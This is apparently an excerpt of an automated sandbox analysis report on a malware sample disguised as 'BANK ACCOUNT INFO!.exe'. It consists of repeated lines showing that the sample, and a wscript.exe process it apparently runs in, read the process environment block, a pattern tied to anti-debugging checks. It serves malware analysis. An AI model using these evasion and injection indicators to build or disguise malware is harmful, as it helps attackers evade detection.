Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01472D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01472D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01472D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01472D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AFD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01532D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01532D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01532D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01532D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01532D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01532D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01532D82 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0150C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0150C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149746D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0154740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0154740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0154740D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014ABC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01548CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_015314FB mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01534496 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0148849B mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0148EF40 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0148FF60 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01548F6A mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0150FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0150FF10 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AA70E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0154070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0154070D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149F716 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01474F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01474F2E mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149B73D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AE730 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B37F5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F7794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01488794 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01487E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01487E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01487E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01487E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01487E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01487E41 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0153AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0153AE44 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0148766D mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0149AE73 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A8E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014AA61C mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01531608 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0147E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0152FE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01548ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A36CC mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014B8EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0152FEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014A16E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014876E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_0150FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_014F46A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01540EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01540EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\BANK ACCOUNT INFO!.exe	Code function: 1_2_01540EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B34496 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A8849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B314FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AF6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AF6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AF6CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B48CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AABC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA3C3E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA3C3E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA3C3E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A8B433 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A8B433 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A8B433 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AF6C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B31C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B4740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B4740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B4740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAAC7B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A9B477 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B0C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B0C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAA44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA35A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04B405AC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA1DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AA2581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A72D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A72D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A72D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A72D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04A72D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 4_2_04AAFD9B mov eax, dword ptr fs:[00000030h]
